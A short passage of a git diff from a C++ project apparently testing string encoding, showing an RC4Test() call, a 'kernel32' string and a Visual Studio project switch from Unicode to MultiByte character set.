RC4Test(); + } char a[] = "kernel32"; diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj b/strCodeTest/strCodeTest/strCodeTest.vcxproj index 607963c..3f8b944 100644 --- a/strCodeTest/strCodeTest/strCodeTest.vcxproj +++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj @@ -30,14 +30,14 @@ Application true v141 - Unicode + MultiByte Application false v141 true - Unicode + MultiByte Application